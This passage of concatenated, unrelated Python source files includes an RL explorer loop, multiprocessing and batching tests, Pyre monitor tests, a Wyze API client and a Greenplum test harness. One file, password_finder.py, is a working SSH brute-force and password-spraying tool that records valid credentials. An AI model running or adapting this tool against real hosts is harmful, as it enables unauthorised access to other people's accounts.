sample = [obs, action, next_obs, rew, done, terminal]
p = pickle.dumps(sample)
z = zlib.compress(p)
while True:
try:
s.send_pyobj(z)
data = s.recv_pyobj()
action = pickle.loads(data)
break
except zmq.ZMQError:
logger.error("send to zmq server[%s] error, sleep 1s" % host)
time.sleep(1)
if str(action) == "stop":
logger.info("[%d],%d finished explore, learning server stoped" % (
id, i))
break
if i % (10 * args.save_rate) == 0:
logger.debug("batch_env[%d] step:%i, episode:%s" %
(id, i, str(episode)))
obs = batch_env.reset_if_done(done, terminal, episode_step, episode)
if i % 10000 == 0:
logger.debug(str(id) + ":" + str(episode))
def parallel_explore(args):
processes = []
for i in range(args.num_env):
p = Process(target=explore, args=(args, i))
p.start()
processes.append(p)
for p in processes:
p.join()
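# --- illustrative sketch, not part of the original module -------------------
# The learner side of the REQ/REP protocol is not shown in this file. The
# minimal REP loop below answers one compressed, pickled sample with a pickled
# action, matching what explore() expects; the port and the "stop" action are
# assumptions for demonstration only.
def _demo_action_server(port=5555):
    c = zmq.Context()
    s = c.socket(zmq.REP)
    s.bind("tcp://*:%d" % port)
    z = s.recv_pyobj()                         # compressed, pickled sample
    sample = pickle.loads(zlib.decompress(z))  # [obs, action, next_obs, rew, done, terminal]
    s.send_pyobj(pickle.dumps("stop"))         # tell the explorer to finish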
|
process_demo1.py
|
# Import the Process class and the os and time modules
from multiprocessing import Process
import os, time
# Define the child_process() function; parameter: sec (seconds to sleep)
def child_process(sec):
print("child_process_%d starts and sleep %d seconds" % (os.getpid(), sec))
time.sleep(sec)
print("child_process_%d ends" % (os.getpid()))
if __name__ == "__main__":
print("Parent Process %s starts" % (os.getpid()))
    # Instantiate three Process objects
p1 = Process(target=child_process, args=(3, ), name='NO.1')
p2 = Process(target=child_process, args=(2, ), name='NO.2')
p3 = Process(target=child_process, args=(1, ), name='NO.3')
print("Child Processes start")
    # Start the child processes
p1.start()
p2.start()
p3.start()
    # Inspect the child process info
print("p1:name=%s,pid=%d,is_alive=%s" % (p1.name,p1.pid,p1.is_alive()))
print("p2:name=%s,pid=%d,is_alive=%s" % (p2.name,p2.pid,p2.is_alive()))
print("p3:name=%s,pid=%d,is_alive=%s" % (p3.name,p3.pid,p3.is_alive()))
    # Wait for the child processes to finish
p1.join()
p2.join()
p3.join()
    # Inspect the child process info again
print("p1:name=%s,pid=%d,is_alive=%s" % (p1.name, p1.pid, p1.is_alive()))
print("p2:name=%s,pid=%d,is_alive=%s" % (p2.name, p2.pid, p2.is_alive()))
print("p3:name=%s,pid=%d,is_alive=%s" % (p3.name, p3.pid, p3.is_alive()))
print("Parent Process ends")
|
dynamic_batching_test.py
|
# Copyright 2021 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading as td
import itertools
import time
import cortex_internal.lib.api.batching as batching
class Predictor:
def predict(self, payload):
time.sleep(0.2)
return payload
def test_dynamic_batching_while_hitting_max_batch_size():
max_batch_size = 32
dynamic_batcher = batching.DynamicBatcher(
Predictor(), max_batch_size=max_batch_size, batch_interval=0.1, test_mode=True
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.predict(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(128):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(60)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
            raise TimeoutError("thread", thread.name, "got stuck")
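    # Payloads are the integers 1..N drawn from `counter`, so their sum must
    # equal the Gauss sum N*(N+1)/2; any mismatch means the batcher dropped
    # or duplicated a payload.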
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the max batch size
assert len(set(batch_lengths)) == 1
assert max_batch_size in batch_lengths
def test_dynamic_batching_while_hitting_max_interval():
max_batch_size = 32
dynamic_batcher = batching.DynamicBatcher(
Predictor(), max_batch_size=max_batch_size, batch_interval=1.0, test_mode=True
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.predict(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(2):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(30)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
            raise TimeoutError("thread", thread.name, "got stuck")
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the number of running threads
assert len(set(batch_lengths)) == 1
assert len(running_threads) in batch_lengths
|
password_finder.py
|
#!/usr/bin/env python3 -tt
#-*- coding: UTF-8 -*-
"""
NAME: password_finder.py
VERSION: 1.0
AUTHOR: Jesse Leverett (CyberThulhu)
STATUS: Building Initial code framework
DESCRIPTION: Allows for a User to bruteforce/password spray SSH credentials
TO-DO:
[ ] Implement Traditional Brute Force Methods
[ ] Implement Single User, Single Password Mode
[ ] Implement Multi User, Multi Password
COPYRIGHT © 2021 Jesse Leverett
"""
# Imports
import sys
import time
import socket
import argparse
import ipaddress
from threading import Thread
from datetime import datetime
try:
from colorama import init, Fore, Back, Style
init()
except ImportError:
print("[-] ERROR: 'colorama' is a required package to run this program")
sys.exit(1)
try:
from paramiko import SSHClient, AutoAddPolicy, AuthenticationException
except ImportError:
print(Fore.RED + Back.YELLOW + "[-] ERROR: 'paramiko' is a required package to run this program." + Fore.RESET + Back.RESET)
sys.exit(1)
# Added Variables
__author__ = "Jesse Leverett"
__copyright__ = "Copyright (C) 2021 Jesse Leverett"
__license__ = "MIT License"
__version__ = "1.0"
def display_banner():
""" Displays Banner """
return ('''
_ __ _ _
| | / _(_) | |
_ __ __ _ ___ _____ _____ _ __ __| | | |_ _ _ __ __| | ___ _ __
| '_ \ / _` / __/ __\ \ /\ / / _ \| '__/ _` | | _| | '_ \ / _` |/ _ \ '__|
| |_) | (_| \__ \__ \\\\ V V / (_) | | | (_| | | | | | | | | (_| | __/ |
| .__/ \__,_|___/___/ \_/\_/ \___/|_| \__,_| |_| |_|_| |_|\__,_|\___|_|
| | ______
|_| |______|
''')
# Instantiate Argparser
PROG_DESCRIPTION = "Allows for a User to bruteforce/password spray SSH credentials"
PROG_EPILOG = f"{__copyright__}"
VERSION_HELP_TEXT = "Prints Version Information"
parser = argparse.ArgumentParser(prog="password_finder",
description = PROG_DESCRIPTION,
epilog = PROG_EPILOG,
formatter_class= argparse.RawDescriptionHelpFormatter)
parser.add_argument('--version', action="version",
version=f"PROG: %(prog)s \t VERSION: {__version__}", help=VERSION_HELP_TEXT)
# Instantiate SubParsers
sub_parser = parser.add_subparsers(description="Select the Mode to Use", dest="passw_finder_mode")
# Add SubParsers
brute_force_parser = sub_parser.add_parser("bf", help="Brute Forcing Mode")
passw_spray_parser = sub_parser.add_parser("ps", help="Password Spraying Mode")
# Shared Arguments
def add_parse_arguments(input_sub_parser=None) -> None:
""" Shared Arguments for Sub-Parsers """
# Help Texts for Arguments
ipaddr_help_text = "Sets IP Address"
port_help_text = "If used; Sets Port [Default: 22]"
timeout_help_text = "If used; Sets SSH Connection timeout (secs) [Default=1]"
qos_help_text = "If used; Exits program on successful credentials"
output_help_text = "If used; Outputs results to file"
verbose_help_text = "If used; Sets Verbosity [Default: False]"
# Add Shared Arguments
input_sub_parser.add_argument('-i', dest="ip_address", metavar='X.X.X.X',
type=str, default=None, required=True, help=ipaddr_help_text)
input_sub_parser.add_argument('-p', dest="protocol_port", metavar='#',
type=int, default=22, required=False, help=port_help_text)
input_sub_parser.add_argument('-t', dest="set_timeout", metavar='#',
type=int, default=1, required=False, help=timeout_help_text)
input_sub_parser.add_argument('-q', dest="quit_on_success", default=False,
required=False, action="store_true", help=qos_help_text)
input_sub_parser.add_argument('-o', dest="output_file", metavar=r'outfile.txt',
type=str, default=None, required=False, help=output_help_text)
input_sub_parser.add_argument('-v', dest="verbose", default=False,
required=False, action="store_true", help=verbose_help_text)
# Brute Forcing Arguments
USERN_HELP_TEXT = "Sets Username to Brute Force"
PASSL_HELP_TEXT = "Sets List of Passwords to Attempt"
LIMIT_HELP_TEXT = "If used; Sets Limit of Password attempts"
WTIME_HELP_TEXT = "If used; Sets Wait time Between Attempts"
brute_force_parser.add_argument('-u', '--username', dest="bf_username", metavar='',
type=str, default=None, required=True, help=USERN_HELP_TEXT)
brute_force_parser.add_argument('-c', '--passlist', dest="bf_passlist", metavar='',
type=str, default=None, required=True, help=PASSL_HELP_TEXT)
brute_force_parser.add_argument('-l', dest="num_of_passw_attempts", metavar='#',
type=int, default=None, required=False, help=LIMIT_HELP_TEXT)
brute_force_parser.add_argument('-w', dest="wait_time_per_attempts", metavar='#',
type=int, default=None, required=False, help=WTIME_HELP_TEXT)
add_parse_arguments(brute_force_parser)
# Password Spraying Arguments
USERL_HELP_TEXT = "Sets List of Users to Password Spray"
PASSW_HELP_TEXT = "Sets Password to Attempt"
passw_spray_parser.add_argument('-u', '--userlist', dest="ps_userlist", metavar='',
type=str, default=None, required=True, help=USERL_HELP_TEXT)
passw_spray_parser.add_argument('-c', '--password', dest="ps_password", metavar='',
type=str, default=None, required=True, help=PASSW_HELP_TEXT)
add_parse_arguments(passw_spray_parser)
# Parse Arguments
pargs = parser.parse_args()
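# Example invocations (illustrative; host and file names are placeholders):
#   ./password_finder.py bf -i 10.0.0.5 -u root -c passwords.txt -q -v
#   ./password_finder.py ps -i 10.0.0.5 -u users.txt -c 'Winter2021!' -o results.txt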
# Initial Functions
def verbosity_checker(verbose_text:str) -> None:
    """ Prints the given text when the verbose argument is set """
if pargs.verbose is True:
print(verbose_text)
def read_file(file:str) -> list:
"""Reads a File"""
# Open and Read a File
outfile = []
with open(fr'{file}', 'r', encoding="utf-8") as infile:
for line in infile.readlines():
outfile.append(line.rstrip())
return outfile
def output_results(result_to_outfile:str, outfile:str=pargs.output_file) -> str:
"""Outputs results to a file or to the screen"""
if outfile is not None:
with open(str(outfile), "a", encoding="utf-8") as output_file:
output_file.write(result_to_outfile)
return f"[!] INFO: Results written to {output_file}"
return result_to_outfile
# Class SSH Connection
class SSHConnect:
""" Class for SSH Connection """
def __init__(self, username:str=None, password:str=None, ip_address:str=pargs.ip_address,
protocol_port:int=pargs.protocol_port) -> None:
self.username = username
self.password = password
self.ip_address = ip_address
self.protocol_port = protocol_port
self.ssh_client = SSHClient()
self.ssh_client.set_missing_host_key_policy(AutoAddPolicy())
def test_ip_struct(self) -> bool:
"""Checks if string is an IP Address"""
try:
verbosity_checker(Fore.BLUE + f"[!] TASK: Checking if {self.ip_address} is VALID..." + Fore.RESET)
ipaddress.ip_address(self.ip_address)
verbosity_checker(Fore.CYAN + f"[+] INFO: {self.ip_address} is VALID!" + Fore.RESET)
return True
except ValueError:
print(Fore.RED + Back.YELLOW + f"[-] ERROR: Address/Netmask is invalid...Skipping: {self.ip_address}" + Fore.RESET + Back.RESET)
return False
def test_connection(self) -> bool:
""" Testing Connection to Destination """
try:
verbosity_checker(Fore.BLUE + f"[!] TASK: Checking if {self.ip_address} is ALIVE..." + Fore.RESET)
socket.gethostbyaddr(self.ip_address)
verbosity_checker(Fore.CYAN + f"[!] INFO: {self.ip_address} is ALIVE!" + Fore.RESET)
return True
except (socket.error, socket.herror, socket.gaierror, socket.timeout, OSError):
print(Fore.RED + Back.YELLOW + f"[-] ERROR: Could not connect to {self.ip_address}." + Fore.RESET + Back.RESET)
return False
def test_protocol(self) -> bool:
""" Testing if SSH/Port 22 is Open """
try:
verbosity_checker(Fore.BLUE + f"[!] TASK: Checking if PORT ->{self.protocol_port} is OPEN..." + Fore.RESET)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as start_socket:
start_socket.settimeout(pargs.set_timeout)
start_socket.connect((self.ip_address, self.protocol_port))
start_socket.shutdown(socket.SHUT_RDWR)
verbosity_checker(Fore.CYAN + f"[!] INFO: {self.protocol_port} is OPEN!" + Fore.RESET)
return True
except (socket.error, socket.herror, socket.gaierror, socket.timeout, OSError):
print(Fore.RED + Back.YELLOW + f"[-] ERROR: Could not connect to PORT:{self.protocol_port}" + Fore.RESET + Back.RESET)
sys.exit(1)
def ssh_connection(self) -> None:
""" Creating Connection to IP/Port """
try:
self.ssh_client.connect(self.ip_address,self.protocol_port,self.username,self.password)
self.ssh_client.close()
print(Fore.GREEN + f"[+] INFO: Correct USER/PASS Combo: {self.username} : {self.password}" + Fore.RESET)
if pargs.output_file is not None:
output_result = f"{'USERNAME: '}{self.username:<13}{'PASSWORD: '}{self.password}\n"
output_results(output_result)
except AuthenticationException:
verbosity_checker(Fore.RED + f"[-] INFO: Incorrect USER/PASS: {self.username} : {self.password}" + Fore.RESET)
def run(run_username:str, run_password:str) -> None:
""" Main Running """
verbosity_checker(f"[+] TASK: Checking USER/PASS -> {run_username}:{run_password}")
SSHConnect(run_username, run_password).ssh_connection()
def main() -> None:
""" Main Code """
init_obj = SSHConnect()
# Test if everything is VALID or REACHABLE
    if init_obj.test_ip_struct() and init_obj.test_connection() and init_obj.test_protocol():
        # If results will be written to a file, create a header first
if pargs.output_file is not None:
ip_header_result = f"IP_ADDRESS: {init_obj.ip_address}"
port_header_result = f"PORT: {init_obj.protocol_port}"
ssh_output_header = f"{ip_header_result:<32}{port_header_result}\n"
output_results(ssh_output_header)
# If mode selected is Brute Force Mode
if pargs.passw_finder_mode == "bf":
bf_password_list = read_file(pargs.bf_passlist)
bf_threads = []
if pargs.num_of_passw_attempts is not None and pargs.wait_time_per_attempts is not None:
for index, password in enumerate(bf_password_list):
if index % pargs.num_of_passw_attempts == 0 and index != 0:
time.sleep(pargs.wait_time_per_attempts)
bf_t = Thread(target=run, args = [pargs.bf_username, password], daemon=True)
bf_t.start()
bf_threads.append(bf_t)
else:
for password in bf_password_list:
bf_t = Thread(target=run, args=[pargs.bf_username, password], daemon=True)
bf_t.start()
bf_threads.append(bf_t)
for bf_thread in bf_threads:
bf_thread.join()
# If mode selected is Password Spray Mode
elif pargs.passw_finder_mode == "ps":
ps_username_list = read_file(pargs.ps_userlist)
ps_threads = []
for username in ps_username_list:
ps_t = Thread(target=run, args=[username, pargs.ps_password], daemon=True)
ps_t.start()
ps_threads.append(ps_t)
for ps_thread in ps_threads:
ps_thread.join()
if __name__ == "__main__":
try:
print(Fore.GREEN + display_banner() + Fore.RESET)
start_time = datetime.now()
main()
close_time = datetime.now()
total_time = close_time - start_time
verbosity_checker(Fore.CYAN + f"[!] INFO: Total Execution Time {total_time}" + Fore.RESET)
sys.exit(0)
except (KeyboardInterrupt, OSError):
sys.exit(1)
|
project_files_monitor_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import json_rpc, project_files_monitor
from ..analysis_directory import AnalysisDirectory, UpdatedPaths
from ..json_rpc import Request, read_request
from ..process import Process
from ..project_files_monitor import MonitorException, ProjectFilesMonitor
from ..socket_connection import SocketConnection, SocketException
from ..tests.mocks import mock_configuration
class MonitorTest(unittest.TestCase):
@patch.object(SocketConnection, "connect")
@patch.object(json_rpc, "perform_handshake")
# pyre-fixme[56]: Argument `tools.pyre.client.project_files_monitor` to
# decorator factory `unittest.mock.patch.object` could not be resolved in a global
# scope.
@patch.object(project_files_monitor, "find_parent_directory_containing_file")
def test_subscriptions(
self,
find_parent_directory_containing_file,
perform_handshake,
_socket_connection,
) -> None:
find_parent_directory_containing_file.return_value = "/ROOT"
configuration = mock_configuration()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["match", "TARGETS"],
],
)
# additional extensions
configuration.extensions = ["thrift", "whl"]
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
["match", "TARGETS"],
],
)
# no watchman root -> terminate
find_parent_directory_containing_file.return_value = None
self.assertRaises(
MonitorException,
ProjectFilesMonitor,
configuration,
".",
analysis_directory,
)
def test_bad_socket(self) -> None:
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
socket_connection = SocketConnection(bad_socket_path)
self.assertRaises(SocketException, socket_connection.connect)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path) -> None:
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
request = Request(
method="handshake/server", parameters={"version": "123"}
)
request.write(outfile)
response = read_request(infile)
if not response or response.method != "handshake/client":
errors.append("Client handshake malformed")
return
request = Request(method="handshake/socket_added")
request.write(outfile)
updated_message = read_request(infile)
if (
not updated_message
or updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
configuration = mock_configuration()
configuration.log_directory = root + "/.pyre"
configuration.extensions = []
configuration.version_hash = "123"
analysis_directory = MagicMock()
analysis_directory.process_updated_files.side_effect = lambda files: UpdatedPaths(
updated_paths=[file.replace("ROOT", "ANALYSIS") for file in files],
deleted_paths=[],
)
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(SocketConnection, "connect")
# pyre-fixme[56]: Argument `tools.pyre.client.json_rpc` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(json_rpc, "perform_handshake")
@patch.object(ProjectFilesMonitor, "_watchman_client")
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_files_cleaned_up(
self,
_find_watchman_path,
_watchman_client,
perform_handshake,
_socket_connection,
) -> None:
with tempfile.TemporaryDirectory() as root:
configuration = mock_configuration()
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = root
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._alive = False # never enter watchman loop
monitor._run()
monitor_folder = os.path.join(".pyre", "file_monitor")
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.lock"))
)
self.assertFalse(
os.path.exists(os.path.join(monitor_folder, "file_monitor.pid"))
)
# pyre-fixme[56]: Argument `os.path` to decorator factory
# `unittest.mock.patch.object` could not be resolved in a global scope.
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath) -> None:
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
".pyre", "long_name" * 15, "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
SocketConnection(socket_link).connect()
server_thread.join()
|
wyzeapi.py
|
#!/usr/bin/python3
import hashlib
import logging
_LOGGER = logging.getLogger(__name__)
from .wyzeapi_exceptions import WyzeApiError
from .wyzeapi_bulb import WyzeBulb
from .wyzeapi_switch import WyzeSwitch
from .wyzeapi_request_manager import RequestManager
class WyzeApi():
def __init__(self, user_name, password):
self._user_name = user_name
self._password = self.create_md5_md5(password)
self._device_id = "bc151f39-787b-4871-be27-5a20fd0a1937"
self._request_man = RequestManager(self)
self._access_token = None
self.initialize()
# Create device array
self._all_devices = []
def initialize(self):
self._access_token = self.login(self._user_name, self._password, self._device_id)
_LOGGER.info("Retrieved access token")
def create_md5_md5(self, password):
digest1 = hashlib.md5(password.encode('utf-8')).hexdigest()
digest2 = hashlib.md5(digest1.encode('utf-8')).hexdigest()
return digest2
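    # For example (derived from the code above): create_md5_md5("password") equals
    # hashlib.md5(hashlib.md5(b"password").hexdigest().encode("utf-8")).hexdigest(),
    # i.e. the hex MD5 of the hex MD5 of the plaintext.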
def login(self, username, password, device_id):
url = "https://api.wyzecam.com/app/user/login"
payload = {
"phone_id":device_id,
"app_name":"com.hualai.WyzeCam",
"app_version":"2.6.62",
"sc":"9f275790cab94a72bd206c8876429f3c",
"password":password,
"sv":"41267de22d1847c8b99bfba2658f88d7",
"user_name":username,
"two_factor_auth":"",
"phone_system_type":"1",
"app_ver":"com.hualai.WyzeCam___2.6.62",
"ts":"1575955440030",
"access_token":""
}
data = self._request_man.do_single_threaded_request(url, payload)
try:
access_token = data['data']['access_token']
return access_token
        except (KeyError, TypeError):
            return None
    def is_valid_login(self):
        return self._access_token is not None
def get_devices(self):
if not self._all_devices:
url = "https://api.wyzecam.com/app/v2/home_page/get_object_list"
payload = {
"phone_system_type":"1",
"app_version":"2.6.62",
"app_ver":"com.hualai.WyzeCam___2.6.62",
"sc":"9f275790cab94a72bd206c8876429f3c",
"ts":"1575953834054",
"sv":"9d74946e652647e9b6c9d59326aef104",
"access_token": self._access_token,
"phone_id": self._device_id,
"app_name":"com.hualai.WyzeCam"
}
data = self._request_man.do_blocking_request(url, payload)
self._all_devices = data['data']['device_list']
return self._all_devices
def list_bulbs(self):
bulbs = []
for device in self.get_devices():
if (device['product_type'] == "Light"):
bulbs.append(WyzeBulb(
self,
device['mac'],
device['nickname'],
("on" if device['device_params']['switch_state'] == 1 else "off")
))
return bulbs
def list_switches(self):
switches = []
for device in self.get_devices():
if (device['product_type'] == "Plug"):
switches.append(WyzeSwitch(
self,
device['mac'],
device['nickname'],
("on" if device['device_params']['switch_state'] == 1 else "off"),
device['product_model']
))
return switches
""" def request_helper(self, url, payload):
r = requests.post(url, headers=self.headers, data=json.dumps(payload))
data = r.json()
if data['code'] != '1':
if data['msg'] == 'AccessTokenError':
_LOGGER.info("Recieved AccessTokenError attempting to regenerate the AccessToken")
self._access_token = None
self.initialize()
else:
raise WyzeApiError(data['msg'])
return data
def do_request(self, url, payload, no_return=False):
if no_return:
x = threading.Thread(target=self.request_helper, args=(url, payload))
x.start()
else:
return self.request_helper(url, payload)
"""
|
sql_isolation_testcase.py
|
"""
Copyright (c) 2004-Present VMware, Inc. or its affiliates.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pg
import pty
import os
import subprocess
import re
import multiprocessing
import tempfile
import time
import sys
import socket
from optparse import OptionParser
import traceback
import select
def is_digit(n):
try:
int(n)
return True
except ValueError:
return False
def null_notice_receiver(notice):
'''
Tests ignore notice messages when analyzing results,
so silently drop notices from the pg.connection
'''
return
class ConnectionInfo(object):
__instance = None
def __init__(self):
self.max_content_id = 0
if ConnectionInfo.__instance is not None:
raise Exception("ConnectionInfo is a singleton.")
query = ("SELECT content, hostname, port, role FROM gp_segment_configuration")
con = pg.connect(dbname="postgres")
self._conn_map = con.query(query).getresult()
con.close()
ConnectionInfo.__instance = self
for content, _, _, _ in ConnectionInfo.__instance._conn_map:
if content >= self.max_content_id:
self.max_content_id = content + 1
@staticmethod
def __get_instance():
if ConnectionInfo.__instance is None:
return ConnectionInfo()
return ConnectionInfo.__instance
@staticmethod
def get_hostname_port(name, role_name):
content_id = int(name)
conn_map = ConnectionInfo.__get_instance()._conn_map
max_content_id = ConnectionInfo.__get_instance().max_content_id
real_content_id = content_id % max_content_id if content_id >= 0 else content_id % (-max_content_id)
for content, host, port, role in conn_map:
if real_content_id == content and role == role_name:
return (host, port)
raise Exception("Cannont find a connection with content_id=%d, role=%c" % (content_id, role_name))
class GlobalShellExecutor(object):
BASH_PS1 = 'test_sh$>'
class ExecutionError(Exception):
""
pass
def __init__(self, output_file='', initfile_prefix=''):
self.output_file = output_file
self.initfile_prefix = initfile_prefix
self.v_cnt = 0
# open pseudo-terminal to interact with subprocess
self.master_fd, self.slave_fd = pty.openpty()
self.sh_proc = subprocess.Popen(['/bin/bash', '--noprofile', '--norc', '--noediting', '-i'],
stdin=self.slave_fd,
stdout=self.slave_fd,
stderr=self.slave_fd,
universal_newlines=True)
self.bash_log_file = open("%s.log" % self.initfile_prefix, "w+")
self.__run_command("export PS1='%s'" % GlobalShellExecutor.BASH_PS1)
self.__run_command("export PS2=''")
self.__run_command("source global_sh_executor.sh")
    def terminate(self, with_error=False):
        if self.sh_proc is None:
return
        # If the matchsubs section were written directly to the output, the generated token ids would be
        # compared by gpdiff.pl, so instead write all matchsubs sections into an auto-generated init file
        # once this test case file has finished.
        if not with_error and self.initfile_prefix is not None and len(self.initfile_prefix) > 1:
output_init_file = "%s.ini" % self.initfile_prefix
cmd = ''' [ ! -z "${MATCHSUBS}" ] && echo "-- start_matchsubs ${NL} ${MATCHSUBS} ${NL}-- end_matchsubs" > %s ''' % output_init_file
self.exec_global_shell(cmd, False)
if self.bash_log_file:
self.bash_log_file.close()
try:
self.sh_proc.terminate()
except OSError as e:
# Ignore the exception if the process doesn't exist.
pass
self.sh_proc = None
def __run_command(self, sh_cmd):
# Strip the newlines at the end. It will be added later.
sh_cmd = sh_cmd.rstrip()
bytes_written = os.write(self.master_fd, sh_cmd.encode())
bytes_written += os.write(self.master_fd, b'\n')
output = ""
while self.sh_proc.poll() is None:
            # If nothing is returned within 10 seconds, treat it as a fatal error.
r, w, e = select.select([self.master_fd], [], [self.master_fd], 10)
if e:
# Terminate the shell when we get any output from stderr
                o = os.read(self.master_fd, 10240).decode()
                self.bash_log_file.write(o)
self.bash_log_file.flush()
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Error happened to the bash daemon, see %s for details." % self.bash_log_file.name)
if r:
o = os.read(self.master_fd, 10240).decode()
self.bash_log_file.write(o)
self.bash_log_file.flush()
output += o
if o.endswith(GlobalShellExecutor.BASH_PS1):
lines = output.splitlines()
return lines[len(sh_cmd.splitlines()):len(lines) - 1]
if not r and not e:
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Timeout happened to the bash daemon, see %s for details." % self.bash_log_file.name)
self.terminate(True)
raise GlobalShellExecutor.ExecutionError("Bash daemon has been stopped, see %s for details." % self.bash_log_file.name)
    # Execute a global shell cmd in the bash daemon, and fetch the result without blocking
    def exec_global_shell(self, sh_cmd, strip_trailing_blank_lines):
if self.sh_proc == None:
raise GlobalShellExecutor.ExecutionError("The bash daemon has been terminated abnormally, see %s for details." % self.bash_log_file.name)
# get the output of shell command
output = self.__run_command(sh_cmd)
        if strip_trailing_blank_lines:
for i in range(len(output)-1, 0, -1):
if len(output[i].strip()) == 0:
del output[i]
else:
break
return output
    # Execute a global shell command:
    # 1) set the input stream -> $RAW_STR
    # 2) execute the shell command from the input
    # If an error occurs, write the error message to err_log_file
    def exec_global_shell_with_orig_str(self, input, sh_cmd, strip_trailing_blank_lines):
self.v_cnt = 1 + self.v_cnt
escape_in = input.replace('\'', "'\\''")
# send shell cmd and set the temp RAW_STR
